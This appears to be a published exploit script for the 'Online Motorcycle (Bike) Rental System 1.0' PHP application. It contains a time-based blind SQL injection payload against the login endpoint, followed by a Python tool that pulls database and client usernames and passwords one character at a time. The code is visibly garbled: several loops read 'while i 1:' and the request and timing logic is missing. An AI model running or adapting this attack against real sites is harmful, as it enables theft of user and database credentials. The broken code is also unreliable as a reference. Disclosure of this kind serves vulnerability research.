# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated) # Exploit Author: Chase Comardelle(CASO) # Date: October 18, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip # Tested on: Kali Linux, Apache, Mysql # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials #EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL; #EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/ import requests import sys import urllib3 import pyfiglet urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} def find_clients_usernames(url): clients = "" cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i 1: clients += chars[i] i=0 position+=1 else: i +=1 return clients def find_db_usernames(url): users = "" cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i 1: users += chars[i] i=0 position+=1 else: i +=1 return users def find_db_passwords(url): passwords = "" clientCount = 0 cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i 1: passwords += chars[i] i=0 position+=1 else: i +=1 return passwords def find_client_passwords(url): passwords = "" clientCount = 0 cookies = {'Cookie:':'PHPSESSID='} headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'} path = '/classes/Login.php?f=login_user' position = 1 i=0 while i 1: passwords += chars[i] i=0 position+=1 else: i +=1 return passwords def create_table(users,passwords): for i in range(0,len(users)): print(users[i]," | ",passwords[i]) def print_header(): print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]") print("[*] Online Motorcycle (Bike) Rental System [*]") print("[*] Unauthenticated Blind Time-Based SQL Injection [*]") print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]") print("\n") print(pyfiglet.figlet_format(" CAS0", font = "slant" )) chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', 'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D', 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S', 'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7', '8','9','@','#',",",'.'] if __name__ == "__main__": try: url = sys.argv[1].strip() except IndexError: print("[-] Usage: %s " % sys.argv[0]) print("[-] Example: %s www.example.com" % sys.argv[0]) sys.exit(-1) print_header() print("[*] RETRIEVING CREDENTIALS NOW [*]") dbUsernames = find_db_usernames(url) dbUsernames = dbUsernames.split(",") dbPasswords = find_db_passwords(url) dbPasswords = dbPasswords.split(",") print("[*] DATABASE CREDENTIALS [*]") create_table(dbUsernames,dbPasswords) clientUsernames = find_clients_usernames(url) clientsUsernames = clientUsernames.split(",") clientPasswords = find_client_passwords(url) clientPasswords = clientPasswords.split(",") print("[*] CLIENT CREDENTIALS [*]") create_table(clientsUsernames,clientPasswords)